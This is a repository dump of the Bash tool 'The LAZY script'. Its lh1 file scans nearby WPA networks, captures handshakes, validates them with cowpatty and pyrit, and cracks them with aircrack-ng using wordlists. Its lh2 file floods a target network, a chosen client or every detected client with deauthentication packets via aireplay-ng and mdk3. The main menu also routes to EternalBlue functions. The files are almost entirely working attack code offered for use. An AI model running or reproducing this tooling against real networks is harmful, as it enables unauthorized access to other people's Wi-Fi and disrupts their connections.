4614 | elif [ "$YORNAA" = "changelog" ]
4615 | then
4616 | clear
4617 | BACKL=1
4618 | cat "$LPATH"/Changelog
4619 | echo -e "$PAKTC"
4620 | $READAK
4621 | clear
4622 | elif [ "$YORNAA" = "" ]
4623 | then
4624 | clear
4625 | exec bash "$0"
4626 | elif [ "$YORNAA" = "errors" ]
4627 | then
4628 | errors_menu
4629 | elif [ "$YORNAA" = "etercheck" ]
4630 | then
4631 | eternalblue_check
4632 | elif [ "$YORNAA" = "eternalblue" ]
4633 | then
4634 | eternalblue
4635 | elif [ "$YORNAA" = "wififb" ]
4636 | then
4637 | wififb
4638 | elif [ "$YORNAA" = "start" ]
4639 | then
4640 | start_menu
4641 | #----------
4642 | elif [ "$YORNAA" = "stop" ]
4643 | then
4644 | stop_menu
4645 | elif [ "$YORNAA" = "exit" ]
4646 | then
4647 | clear
4648 | exit
4649 | fi
4650 | ####check if it is ks
4651 | var1=1
4652 | check_if_ks
4653 | ####
4654 | }
4655 |
4656 | ####################################
4657 | defaults_l
4658 | printf '\033]2;The LAZY script\a'
4659 | if [ "$ONETIMEPERLAUNCH" != "1" ]
4660 | then
4661 | one_time_per_launch_ks
4662 | fi
4663 | ####################################
4664 | if [ -f ""$LPATH"/IAGREE.txt" ]
4665 | then
4666 |
4667 | if [ ! -f ""$LPATH"/wlan.txt" ]
4668 | then
4669 | set_interface_number
4670 | fi
4671 | clear
4672 | WLANNM=$(cat "$LPATH"/wlanmon.txt)
4673 | WLANN=$(cat "$LPATH"/wlan.txt)
4674 | export WLANNM
4675 | export WLANN
4676 | managed_spaces
4677 | monitor_spaces
4678 | banner
4679 | main_options
4680 | if [ "$BACKL" = "1" ]
4681 | then
4682 | exec bash "$0"
4683 |
4684 | else
4685 | echo -e "$PAKTGB"
4686 | $READAK
4687 | exec bash "$0"
4688 | fi
4689 | else
4690 | terms_of_use
4691 | fi
4692 |
--------------------------------------------------------------------------------
/lh1:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | WLANNM=$(cat /root/lscript/wlanmon.txt)
3 | export WLANNM
4 | #############DEFAULTS###############
5 |
6 | #setting blue-start
7 | BS="\e[0;34m"
8 | #setting yellow-start
9 | YS="\e[1;33m"
10 | #setting color-end
11 | CE="\e[0m"
12 | #setting red-start
13 | RS="\e[1;31m"
14 | #setting frequent stings
15 | YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=yes)"
16 | YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=no)"
17 | YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
18 | PAKT="Press "$YS"any key"$CE" to"
19 | PAKTC="Press "$YS"any key"$CE" to continue..."
20 | PAKTGB="Press "$YS"any key"$CE" to go back..."
21 | READAK="read -n 1"
22 | #-----------------FUNCTIONS-----------------
23 | function start_capture
24 | {
25 | export HANDF
26 | if [ "$HANDF" != "0" ]
27 | then
28 | if [ -f "$HANDCAP" ]
29 | then
30 | rm $HANDCAP
31 | fi
32 | gnome-terminal --geometry 70x10+0+0 -e lh2
33 | HANDFORDEAUTH="/root/handshakes/$HANDF-01.csv"
34 | export HANDFORDEAUTH
35 | airodump-ng --bssid $TARGB -c $TARGC -w /root/handshakes/$HANDF $WLANNM # | tee /root/lscript/temphandshake
36 | validhandshake
37 | exec bash "$0"
38 | else
39 | HANDFORDEAUTH=""
40 | gnome-terminal --geometry 70x10+0+0 -e lh2
41 | airodump-ng --bssid $TARGB -c $TARGC $WLANNM
42 | echo -e "Start capturing on a file?"$YNYES""
43 | read SCF
44 | if [ "$SCF" = "n" ]
45 | then
46 | clear
47 | exec bash "$0"
48 | else
49 | echo -e "Enter the name of the handshake file(no extension): "
50 | read -e HANDF
51 | HANDFFP="/root/handshakes/$HANDF-01.cap"
52 | export HANDFFP
53 | if [ -f "$HANDFFP" ]
54 | then
55 | rm $HANDFFP
56 | fi
57 | gnome-terminal -e lh2
58 | airodump-ng --bssid $TARGB -c $TARGC -w /root/handshakes/$HANDF $WLANNM
59 | validhandshake
60 | exec bash "$0"
61 | fi
62 | fi
63 | }
64 | function remove_temps
65 | {
66 | if [ -f /root/lscript/tempairodump-01.cap ]
67 | then
68 | rm /root/lscript/tempairodump-01.cap
69 | fi
70 | if [ -f /root/lscript/tempairodump-01.csv ]
71 | then
72 | rm /root/lscript/tempairodump-01.csv
73 | fi
74 | if [ -f /root/lscript/tempairodump-01.kismet.netxml ]
75 | then
76 | rm /root/lscript/tempairodump-01.kismet.netxml
77 | fi
78 | if [ -f /root/lscript/tempairodump-01.kismet.csv ]
79 | then
80 | rm /root/lscript/tempairodump-01.kismet.csv
81 | fi
82 | }
83 | function autoapselect
84 | {
85 | file="/root/lscript/tempairodump-01.csv"
86 | lines=$(cat $file | awk '/WPA|WPA2|OPN/ {print}' | awk 'END{print NR}')
87 | n2=1
88 | power=100
89 | if [ $lines != 0 ]
90 | then
91 | while [ $n2 -le "$lines" ]
92 | do
93 | n3=$((n2+2))
94 | apower[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "}{if(NR==nn && /WPA|WPA2/)print $8}')
95 | aopen[$n2]=0
96 | if [[ ${apower[$n2]} = "" ]]
97 | then
98 | aopen[$n2]=1
99 | apower[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "}{if(NR==nn && /OPN/)print $9}')
100 | fi
101 | adata[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "} {if(NR==nn && /WPA|WPA2/)print $10}')
102 | if [[ ${adata[$n2]} = "" ]]
103 | then
104 | adata[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "}{if(NR==nn && /OPN/)print $11}')
105 | fi
106 | aessid[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "} {if(NR==nn && /WPA|WPA2/)print $13}')
107 | if [[ ${aessid[$n2]} = "" ]]
108 | then
109 | aessid[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "}{if(NR==nn && /OPN/)print $14}')
110 | fi
111 | achannel[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "} {if(NR==nn && /WPA|WPA2/)print $4}')
112 | if [[ ${achannel[$n2]} = "" ]]
113 | then
114 | achannel[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "}{if(NR==nn && /OPN/)print $14}')
115 | fi
116 | amac[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "} {if(NR==nn && /WPA|WPA2/)print $1}')
117 | if [[ ${amac[$n2]} = "" ]]
118 | then
119 | amac[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "}{if(NR==nn && /OPN/)print $1}')
120 | fi
121 | powerunfixed="${apower[$n2]}"
122 | apowerfixed[$n2]=$powerunfixed
123 | apowerfixed[$n2]=$((power+apowerfixed[$n2]))
124 | #echo ""$n2") "${apowerfixed[$n2]}"% "${amac[$n2]}" "${achannel[$n2]}" "${adata[$n2]}" "${aessid[$n2]}""
125 | n2=$(( n2+1 ))
126 | done
127 | n3=1
128 | while [ $n3 -le "$lines" ]
129 | do
130 | n=1
131 | topsignal=100
132 | while [ $n -le "$lines" ]
133 | do
134 | if [ ${apowerfixed[$n]} -le $topsignal ]
135 | then
136 | lowestn=$n
137 | topsignal=${apowerfixed[$n]}
138 | fi
139 | n=$((n+1))
140 | done
141 | zn[$n3]=$lowestn
142 | zopen[$n3]=${aopen[$lowestn]}
143 | zdata[$n3]=${adata[$lowestn]}
144 | zessid[$n3]=${aessid[$lowestn]}
145 | zpowerfixed[$n3]=${apowerfixed[$lowestn]}
146 | zmac[$n3]=${amac[$lowestn]}
147 | zchannel[$n3]=${achannel[$lowestn]}
148 | apowerfixed[$lowestn]=101
149 | n3=$((n3+1))
150 | done
151 | n3=1
152 | echo -e ""$BS" BLUE"$CE"=OPEN NETWORK"
153 | echo -e ""$YS"YELLOW"$CE"=WPA/WPA2 NETWORK WITH ACTIVE CLIENTS"
154 | echo -e ""$RS" RED"$CE"=WPA/WPA2 NETWORK WITHOUT ACTIVE CLIENTS"
155 | echo -e "_________________________________________________________________________________________"
156 | echo -e " POWER ESSID MAC CLIENTS DATA"
157 | while [ $n3 -le "$lines" ]
158 | do
159 | size=${#zessid[$n3]}
160 | calc=$(( 40-size ))
161 | numcalc=1
162 | SPACES=""
163 | while [ $numcalc != $calc ]
164 | do
165 | SPACES=""$SPACES"_"
166 | numcalc=$(( numcalc+1 ))
167 | done
168 | if [ $n3 -le 9 ]
169 | then
170 | num=" "$n3""
171 | else
172 | num=$n3
173 | fi
174 | size=${#zpowerfixed[$n3]}
175 | if [ $size == 3 ]
176 | then
177 | space=""
178 | elif [ $size == 2 ]
179 | then
180 | space=" "
181 | elif [ $size == 1 ]
182 | then
183 | space=" "
184 | fi
185 | DATAA=" "$RS"0"$CE""
186 | ##put less than
187 | #~ if [[ ! ${zpowerfixed[$n3]} = 100 ]]
188 | if [[ ${zpowerfixed[$n3]} -lt 100 ]]
189 | then
190 | size2=${#zessid[$n3]}
191 | if [[ $size2 -eq 36 ]]
192 | then
193 | zessid[$n3]="____________________________________"
194 | fi
195 | START=""
196 | if [[ ${zopen[$n3]} = 1 ]]
197 | then
198 | START="$BS"
199 | if [[ ${zdata[$n3]} -gt 0 ]]
200 | then
201 | CLIENTS="YES"
202 | DATAA="${zdata[$n3]}"
203 | else
204 | CLIENTS="NO "
205 | fi
206 | else
207 | if [[ ${zdata[$n3]} -gt 0 ]]
208 | then
209 | CLIENTS="YES"
210 | START="$YS"
211 | DATAA="${zdata[$n3]}"
212 | else
213 | START="$RS"
214 | CLIENTS="NO "
215 | fi
216 | fi
217 | echo -e ""$YS""$num""$CE") "$START"${space}"${zpowerfixed[$n3]}"% "${zessid[$n3]}""$SPACES""${zmac[$n3]}" "$CLIENTS" "$DATAA""$CE""
218 | fi
219 | n3=$((n3+1))
220 | done
221 | else
222 | echo -e ""$RS"No networks found nearby."$CE""
223 | fi
224 | echo -e ""$YS" r"$CE") rescan"
225 | echo -e ""$YS"back"$CE") Go back"
226 | echo -e "Choose: "
227 | }
228 | function capture_again
229 | {
230 | echo -e "Capture handshake again on the same network? "$YNYES""
231 | read CAGAIN
232 | if [ ! "$CAGAIN" = "n" ]
233 | then
234 | gnome-terminal --geometry 70x10+0+0 -e lh2
235 | airodump-ng --bssid $TARGB -c $TARGC -w /root/handshakes/$HANDF $WLANNM
236 | validhandshake
237 | exec bash "$0"
238 | fi
239 | }
240 | function ap_sort_and_choose
241 | {
242 | while true
243 | do
244 | clear
245 | autoapselect
246 | read APCHOOSE
247 | clear
248 | if [[ $APCHOOSE = "back" ]]
249 | then
250 | clear
251 | break
252 | elif [[ $APCHOOSE = "r" ]]
253 | then
254 | clear
255 | break
256 | elif [[ ! -z $APCHOOSE ]]
257 | then
258 | if [[ ${zopen[$APCHOOSE]} = 1 ]]
259 | then
260 | echo -e ""$RS"You selected an open network.Please select a password protected network."$CE""
261 | echo -e "Press "$YS"enter"$CE" to go back"
262 | read
263 | break
264 | fi
265 | TARGB="${zmac[$APCHOOSE]}"
266 | TARGC="${zchannel[$APCHOOSE]}"
267 | TARGE="${zessid[$APCHOOSE]}"
268 | echo -e "Enter the name of the handshake file(no extention)(e.g: "$YS"hand1"$CE")"
269 | echo -e "Type "$YS""0""$CE" for no file"
270 | read -e HANDF
271 | HANDFFP="/root/handshakes/"$HANDF"-01.cap"
272 | HANDCAP="/root/handshakes/"$HANDF"-01.cap"
273 | export HANDCAP
274 | export HANDFFP
275 | export TARGB
276 | export TARGC
277 | export TARGE
278 | #echo $TARGB $TARGC $TARGE
279 | clear
280 | start_capture
281 | break
282 | fi
283 | done
284 | }
285 | function pre_scan
286 | {
287 | while true
288 | do
289 | remove_temps
290 | echo -e "Select what to scan: "
291 | echo -e ""$YS"ENTER"$CE") All channels"
292 | echo -e " "$YS"1"$CE"-"$YS"13"$CE") Specific channel"
293 | echo -e ""$YS" back"$CE") Go back"
294 | read CHANNELSL
295 | if [ "$CHANNELSL" = "" ]
296 | then
297 | FJC=0
298 | airodump-ng $WLANNM -w /root/lscript/tempairodump
299 | elif [ "$CHANNELSL" = "back" ]
300 | then
301 | clear
302 | CH="0"
303 | break
304 | else
305 | FJC=0
306 | airodump-ng -c $CHANNELSL $WLANNM -w /root/lscript/tempairodump
307 | fi
308 | ap_sort_and_choose
309 | if [ $APCHOOSE = "r" ]
310 | then
311 | continue
312 | elif [ $APCHOOSE = "back" ]
313 | then
314 | break
315 | fi
316 | done
317 | }
318 | function scan_networks
319 | {
320 | if [[ $TARGB = "" ]]
321 | then
322 | pre_scan
323 | else
324 | ap_sort_and_choose
325 | if [ $APCHOOSE = "r" ]
326 | then
327 | TARGB=""
328 | pre_scan
329 | elif [ $APCHOOSE = "back" ]
330 | then
331 | break
332 | fi
333 | fi
334 | }
335 | function validate_with_pyrit
336 | {
337 | clear
338 | echo -e "Checking handshake with pyrit..."
339 | TEMP=$(pyrit -r "$HANDCAP" analyze)
340 | TEMPHAND=$(echo "$TEMP" | grep "No valid EAOPL-handshake + ESSID detected.")
341 | clear
342 | if [ "$TEMPHAND" = "" ]
343 | then
344 | VALIDH=1
345 | #TEMPHANDD=$(pyrit -r "$HANDCAP" analyze | grep "good")
346 | TEMPHANDD=$(echo "$TEMP" | grep "good")
347 | if [ "$TEMPHANDD" = "" ]
348 | then
349 | #TEMPHANDDD=$(pyrit -r "$HANDCAP" analyze | grep "bad")
350 | TEMPHANDDD=$(echo $TEMP | grep "bad")
351 | if [ "TEMPHANDDD" = "" ]
352 | then
353 | echo -e "Handshake found!(Status: unknown)"
354 | else
355 | echo -e "Handshake found!(Status: bad)"
356 | fi
357 | sleep 3
358 | else
359 | echo -e "Valid handshake found!(Status: good)"
360 | sleep 3
361 | fi
362 | else
363 | VALIDH=0
364 | echo -e "No handshake found."
365 | sleep 2
366 | fi
367 | }
368 | function validate_with_cowpatty
369 | {
370 | clear
371 | echo -e "Checking handshake with cowpatty..."
372 | sleep 1
373 | TEMPHAND=$(cowpatty -c -r "$HANDCAP" | grep "Collected all necessary data to mount crack against WPA2/PSK passphrase.")
374 | clear
375 | if [ "$TEMPHAND" = "" ]
376 | then
377 | VALIDH=0
378 | echo -e "No handshake found."
379 | sleep 1
380 | echo -e ""
381 | echo -e "Press "$YS"enter"$CE" to check with pyrit..."
382 | read
383 | validate_with_pyrit
384 | else
385 | VALIDH=1
386 | echo -e "Valid handshake found!"
387 | sleep 2
388 | fi
389 | }
390 | function handshake_clean
391 | {
392 | clear
393 | pyrit -r $HANDCAP -o /root/handshakes/"$HANDF"-cleaned.cap strip && echo -e "CLEANED"
394 | sleep 2
395 | }
396 | function validhandshake
397 | {
398 | echo -e "Did you capture the handshake?"$YNYES""
399 | read HANDVALID
400 | if [ "$HANDVALID" = "n" ]
401 | then
402 | echo -e "Removing the file..."
403 | sleep 2
404 | rm $HANDFFP
405 | remove_temps
406 | FJC=0
407 | else
408 | FJC=1
409 | HANDCAP=/root/handshakes/"$HANDF"-01.cap
410 | validate_with_cowpatty
411 | if [ "$VALIDH" = "0" ]
412 | then
413 | FJC=0
414 | echo -e "Couldn't validate your handshake. Delete it? "$YNYES""
415 | read NOVALDEL
416 | if [ ! "$NOVALDEL" = "n" ]
417 | then
418 | rm /root/handshakes/"$HANDF"-01.*
419 | clear
420 | capture_again
421 | fi
422 | else
423 | clear
424 | echo -e "Do you want to clean your handshake?"$YNYES""
425 | read HANDCC
426 | clear
427 | if [ $HANDCC = "n" ]
428 | then
429 | echo -e "Your handshake file is saved in: /root/handshakes/"$HANDF"-01.cap"
430 | else
431 | pyrit -r $HANDCAP -o /root/handshakes/"$HANDF"-cleaned.cap strip && echo -e "Your handshake is now cleaned! You can find it at: /root/handshakes/"$HANDF"-cleaned.cap"
432 | echo -e "$PAKTGB"
433 | $READAK
434 | fi
435 | echo -e "$PAKTC"
436 | $READAK
437 | fi
438 |
439 | fi
440 | clear
441 | }
442 | function capture_handshake
443 | {
444 | while true
445 | do
446 | AA=-1
447 | clear
448 | echo -e ""$YS" 1"$CE") Use selected: $TARGE"
449 | echo -e ""$YS" 2"$CE") Set another BSSID and CHANNEL"
450 | echo -e ""$YS" r"$CE") Scan again"
451 | echo -e ""$YS"back"$CE") Go back"
452 | echo -e "Choose: "
453 | read CAPTH
454 | if [ $CAPTH = "back" ]
455 | then
456 | break
457 | elif [ $CAPTH = "2" ]
458 | then
459 | echo -e "Enter your target's bssid: "
460 | read -e TARGB
461 | echo -e "Enter your target's channel: "
462 | read -e TARGC
463 | echo -e "Enter the name of the handshake file(no extension): "
464 | echo -e "(don't use the same name twice)"
465 | echo -e "Type "$YS""0""$CE" for no file"
466 | read -e HANDF
467 | TARGE=""
468 | HANDFFP="/root/handshakes/"$HANDF"-01.cap"
469 | HANDCAP="/root/handshakes/"$HANDF"-01.cap"
470 | export HANDCAP
471 | export HANDFFP
472 | export TARGB
473 | export TARGC
474 | export TARGE
475 | clear
476 | start_capture
477 | break
478 | elif [ $CAPTH = "r" ]
479 | then
480 | scan_networks
481 | break
482 | elif [ $CAPTH = "1" ]
483 | then
484 | if [[ $TARGE = "" ]]
485 | then
486 | echo -e "No network selected.Start scanning and select your target."
487 | sleep 4
488 | break
489 | else
490 | echo -e "Enter the name of the handshake file(no extension): "
491 | echo -e "(don't use the same name twice)"
492 | echo -e "Type "$YS""0""$CE" for no file"
493 | read -e HANDF
494 | TARGE=""
495 | HANDFFP="/root/handshakes/"$HANDF"-01.cap"
496 | HANDCAP="/root/handshakes/"$HANDF"-01.cap"
497 | export HANDCAP
498 | export HANDFFP
499 | clear
500 | start_capture
501 | break
502 | fi
503 | fi
504 | done
505 | }
506 | function aircrack_handshakejust
507 | {
508 | clear
509 | echo -e "Do you want to use the file you just captured?"$YNYES": "
510 | read -e YORN
511 | clear
512 | if [ "$YORN" = "n" ]
513 | then
514 | cd /root/handshakes
515 | ls | sort
516 | cd
517 | echo -e "Enter handshake name(no extension)(on folder /root/handshakes/): "
518 | read -e HANDFK
519 | HANDFFK="/root/handshakes/$HANDFK-01.cap"
520 | if [ -f "$HANDFFK" ];
521 | then
522 | echo -e "OK."
523 | HANDFFP="$HANDFFK"
524 | sleep 1
525 | clear
526 | else
527 | echo -e "File $HANDFK does not exist"
528 | sleep 2
529 | clear
530 | exec bash "$0"
531 | fi
532 | cd /root/wordlists
533 | ls | sort
534 | cd
535 | echo -e "Enter wordlist name(include extension)(on folder /root/wordlists/): "
536 | read -e WORDF
537 | WORDFF="/root/wordlists/$WORDF"
538 | if [ -f "$WORDFF" ];
539 | then
540 | echo -e "OK."
541 | sleep 1
542 | clear
543 | else
544 | echo -e "File $WORDF does not exist"
545 | sleep 2
546 | clear
547 | exec bash "$0"
548 | fi
549 | else
550 | cd /root/wordlists
551 | ls | sort
552 | cd
553 | echo -e "Enter wordlist name(include extension)(on folder /root/wordlists/): "
554 | read -e WORDF
555 | WORDFF="/root/wordlists/$WORDF"
556 | if [ -f "$WORDFF" ];
557 | then
558 | echo -e "OK."
559 | sleep 1
560 | else
561 | echo -e "File $WORDF does not exist"
562 | sleep 2
563 | clear
564 | exec bash "$0"
565 | fi
566 | fi
567 | clear
568 | aircrack-ng -w $WORDFF $HANDFFP
569 | }
570 | function aircrack_handshake
571 | {
572 | clear
573 | cd /root/handshakes
574 | ls | sort
575 | cd
576 | echo -e ""$YS"back"$CE") Go back"
577 | echo -e "Enter handshake name(include extension)(on folder /root/handshakes/): "
578 | read -e HANDFT
579 | if [ $HANDFT = "back" ]
580 | then
581 | clear
582 | exec bash $0
583 | fi
584 | HANDFFT="/root/handshakes/$HANDFT"
585 | if [ -f "$HANDFFT" ];
586 | then
587 | echo -e "OK."
588 | sleep 1
589 | clear
590 | else
591 | echo -e ""$RS"File $HANDFT does not exist"$CE""
592 | sleep 2
593 | clear
594 | exec bash $0
595 | fi
596 | cd /root/wordlists
597 | ls | sort
598 | cd
599 | echo -e "Enter wordlist name(include extension)(on folder /root/wordlists/): "
600 | read -e WORDF
601 | WORDFF="/root/wordlists/$WORDF"
602 | if [ -f "$WORDFF" ];
603 | then
604 | echo -e "OK."
605 | sleep 1
606 | clear
607 | else
608 | echo -e "File $WORDF does not exist"
609 | sleep 2
610 | clear
611 | continue
612 | fi
613 |
614 | clear
615 | aircrack-ng -w $WORDFF $HANDFFT
616 | }
617 | function main_handshake_options
618 | {
619 | while true
620 | do
621 | clear
622 | printf '\033]2;HANDSHAKE\a'
623 | if [ -f "/root/handshakes/*.csv" ]
624 | then
625 | rm /root/handshakes/*.csv
626 | rm /root/handshakes/*.netxml
627 | fi
628 | echo -e "----------------------------"$RS"HANDSHAKE"$CE"----------------------------"
629 | if [[ $TARGE = "" ]]
630 | then
631 | echo -e ""$YS" 1"$CE") Scan networks nearby Selected:"$RS"None"$CE""
632 | else
633 | echo -e ""$YS" 1"$CE") Scan networks nearby Selected:"$YS""$TARGE""$CE""
634 | fi
635 | echo -e ""$YS" 2"$CE") Capture handshake"
636 | echo -e ""$YS" 3"$CE") Aircrack the handshake"
637 | echo -e ""$YS" 4"$CE") Verify a handshake"
638 | echo -e ""$YS" 5"$CE") Clean a handshake"
639 | echo -e ""$YS" 6"$CE") Remove .csv and .netxml files"
640 | echo -e ""$YS" 0"$CE") EXIT"
641 | echo -e " Choose: "
642 | sleep 1
643 | CH=0
644 | read -e AA
645 | clear
646 | if [ "$AA" = "1" ]
647 | then
648 | CH=1
649 | scan_networks
650 | elif [ "$AA" = "2" ]
651 | then
652 | capture_handshake
653 | elif [ "$AA" = "3" ]
654 | then
655 | if [ "$FJC" = "1" ]
656 | then
657 | AAGAIN=1
658 | aircrack_handshakejust
659 | else
660 | AAGAIN=2
661 | aircrack_handshake
662 | fi
663 | elif [ "$AA" = "4" ]
664 | then
665 | echo -e "------------------You are in /root/handshakes folder--------------------"
666 | ls /root/handshakes
667 | echo -e "Type the name of the handshake you want to check:(e.g: "$YS"hand1-01"$CE")"
668 | echo -e ""$RS"No extention"$CE""
669 | read HANDF
670 | if [ ! -f /root/handshakes/"$HANDF" ]
671 | then
672 | if [ -f /root/handshakes/"$HANDF".cap ]
673 | then
674 | HANDCAP=/root/handshakes/"$HANDF".cap
675 | else
676 | if [ -f /root/handshakes/"$HANDF"-01.cap ]
677 | then
678 | HANDCAP=/root/handshakes/"$HANDF"-01.cap
679 | else
680 | echo -e "Handshake file not found!"
681 | sleep 3
682 | continue
683 | fi
684 | fi
685 | else
686 | HANDCAP=/root/handshakes/"$HANDF"
687 | fi
688 | validate_with_cowpatty
689 | elif [ "$AA" = "5" ]
690 | then
691 | echo -e "------------------You are in /root/handshakes folder--------------------"
692 | ls /root/handshakes
693 | echo -e "Type the name of the handshake you want to clean:(e.g: "$YS"hand1-01"$CE")"
694 | echo -e ""$RS"No extention"$CE""
695 | read HANDF
696 | if [ ! -f /root/handshakes/"$HANDF" ]
697 | then
698 | if [ -f /root/handshakes/"$HANDF".cap ]
699 | then
700 | HANDCAP=/root/handshakes/"$HANDF".cap
701 | else
702 | if [ -f /root/handshakes/"$HANDF"-01.cap ]
703 | then
704 | HANDCAP=/root/handshakes/"$HANDF"-01.cap
705 | else
706 | echo -e "Handshake file not found!"
707 | sleep 3
708 | continue
709 | fi
710 | fi
711 | else
712 | HANDCAP=/root/handshakes/"$HANDF"
713 | fi
714 | handshake_clean
715 | elif [ "$AA" = "6" ]
716 | then
717 | rm -f /root/handshakes/*.csv
718 | rm -f /root/handshakes/*.netxml
719 | sleep 0.2
720 | clear
721 | exec bash "$0"
722 | elif [ "$AA" = "0" ]
723 | then
724 | exit
725 | else
726 | clear
727 | continue
728 | fi
729 | done
730 | }
731 | #-------------------------------------------
732 | main_handshake_options
733 |
--------------------------------------------------------------------------------
/lh2:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | #############DEFAULTS###############
3 | #setting yellow-start
4 | YS="\e[1;33m"
5 | #setting color-end
6 | CE="\e[0m"
7 | #setting red-start
8 | RS="\e[1;31m"
9 | #setting frequent stings
10 | YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=yes)"
11 | YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=no)"
12 | YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
13 | PAKT="Press "$YS"any key$CE to"
14 | PAKTC="Press "$YS"any key$CE to continue..."
15 | PAKTGB="Press "$YS"any key$CE to go back..."
16 |
17 | ####################################
18 | printf '\033]2;DEAUTH MENU\a'
19 | k=1
20 | REDEAUTH="n"
21 | WLANNM=$(cat /root/lscript/wlanmon.txt)
22 | export WLANNM
23 | ####################################
24 | printf '\033]2;DEAUTH MENU\a'
25 | REDEAUTH="n"
26 | WLANNM=$(cat /root/lscript/wlanmon.txt)
27 | export WLANNM
28 | function option4
29 | {
30 | rm -f /root/lscript/deauthtemp.txt
31 | while true
32 | do
33 | echo -e "Searching for clients(If it doesnt load in 1 sec, it won't.)"
34 | dlines=$(cat $HANDFORDEAUTH | awk 'END{print NR}')
35 | dlines=$((dlines-6))
36 | clear
37 | echo -e "Found $dlines clients."
38 | if [ $dlines -gt 0 ]
39 | then
40 | n=0
41 | while [ $n -lt $dlines ]
42 | do
43 | n=$((n+1))
44 | n1=$((5+n))
45 | MAC=$(cat $HANDFORDEAUTH | awk -v nn="$n1" '{FS=","}{if(NR==nn)print $1}')
46 | if [[ $MAC = "" ]]
47 | then
48 | echo -e "Empty MAC.Skipping..."
49 | continue
50 | fi
51 | if [ -f /root/lscript/deauthtemp.txt ]
52 | then
53 | CHECKMAC=$(cat /root/lscript/deauthtemp.txt | awk -v n2="$MAC" '{if($0 ~ n2)print}')
54 | if [[ $CHECKMAC != "" ]]
55 | then
56 | echo -e "$MAC already being deauthed.Skipping..."
57 | continue
58 | fi
59 | fi
60 | echo $MAC >> /root/lscript/deauthtemp.txt
61 | echo -e "Deauthing "$MAC"..."
62 | export MAC
63 | xterm -geometry 90x15+9999+999999 -e bash -c 'printf "\033]2;DEAUTHING\a" && aireplay-ng -0 0 -a $TARGB -c $MAC $WLANNM; exec bash' & disown
64 | done
65 | else
66 | echo -e "No clients connected..."
67 | fi
68 | sleep 5
69 | clear
70 | break
71 | #sleep 5
72 | done
73 | }
74 | while true
75 | do
76 | clear
77 | echo -e ""$YS" 1"$CE") Deauth all aireplay-ng"
78 | echo -e ""$YS" 2"$CE") Deauth all mdk3"
79 | echo -e ""$YS" 3"$CE") Deauth client aireplay-ng"
80 | if [[ $HANDF != 0 || $HANDF != "" ]]
81 | then
82 | echo -e ""$YS" 4"$CE") Deauth every client aireplay-ng"
83 | fi
84 | if [[ HANDFORDEAUTH != "" ]]
85 | then
86 | echo -e ""$YS"ENTER"$CE") Last option"
87 | fi
88 | echo -e ""$YS" 0"$CE") EXIT"
89 | read DT
90 | if [[ $DT = 1 ]]
91 | then
92 | echo -e "Number of deauths to send("$YS"0"$CE"=inf)("$YS"Enter"$CE"=0): "
93 | read -e DEAUTHS
94 | if [ -z $DEAUTHS ]
95 | then
96 | DEAUTHS=0
97 | fi
98 | LASTOPTIONS="aireplay-ng -0 $DEAUTHS -a $TARGB $WLANNM"
99 | export DEAUTHS
100 | export TARGB
101 | xterm -geometry 90x15+9999+999999 -e bash -c 'printf "\033]2;DEAUTHING\a" && aireplay-ng -0 $DEAUTHS -a $TARGB $WLANNM && exit; exec bash'
102 | elif [[ $DT == "" ]]
103 | then
104 | if [[ HANDFORDEAUTH != "" ]]
105 | then
106 | if [[ LASTOPTIONS != "" ]]
107 | then
108 | if [ LASTOPTIONS = 1 ]
109 | then
110 | option4
111 | else
112 | xterm -geometry 90x15+9999+999999 -e bash -c "$LASTOPTIONS; exec bash"
113 | fi
114 | fi
115 | fi
116 | sleep 2
117 | elif [[ $DT = 2 ]]
118 | then
119 | echo "$TARGB" > /root/mdk3bssid.txt
120 | LASTOPTIONS="mdk3 $WLANNM d -b /root/mdk3bssid.txt -c $TARGC"
121 | export DEAUTHS
122 | export TARGB
123 | xterm -geometry 90x15+9999+999999 -e bash -c 'mdk3 $WLANNM d -b /root/mdk3bssid.txt -c $TARGC; exec bash'
124 | elif [[ $DT = 3 ]]
125 | then
126 | echo -e "Client's MAC: "
127 | read -e TCC
128 | echo -e "Number of deauths to send("$YS"0"$CE"=inf)("$YS"Enter"$CE"=0): "
129 | read -e DEAUTHS
130 | clear
131 | if [ -z $DEAUTHS ]
132 | then
133 | DEAUTHS=0
134 | fi
135 | LASTOPTIONS="aireplay-ng -0 $DEAUTHS -a $TARGB -c $TCC $WLANNM"
136 | export DEAUTHS
137 | export TARGB
138 | export TCC
139 | xterm -geometry 90x15+9999+999999 -e bash -c 'printf "\033]2;DEAUTHING\a" && aireplay-ng -0 $DEAUTHS -a $TARGB -c $TCC $WLANNM && exit; exec bash'
140 | elif [[ $DT = 4 ]]
141 | then
142 | LASTOPTIONS=1
143 | option4
144 | elif [[ $DT = 0 ]]
145 | then
146 | exit
147 | fi
148 | done
149 |
--------------------------------------------------------------------------------
/lh3:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 |
3 | #############DEFAULTS###############
4 |
5 | #setting yellow-start
6 | YS="\e[1;33m"
7 | #setting color-end
8 | CE="\e[0m"
9 | #setting red-start
10 | RS="\e[1;31m"
11 | #setting frequent stings
12 | YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=yes)"
13 | YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=no)"
14 | YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
15 | PAKT="Press "$YS"any key$CE to"
16 | PAKTC="Press "$YS"any key$CE to continue..."
17 | PAKTGB="Press "$YS"any key$CE to go back..."
18 |
19 | ####################################
20 | printf '\033]2;WPS MENU\a'
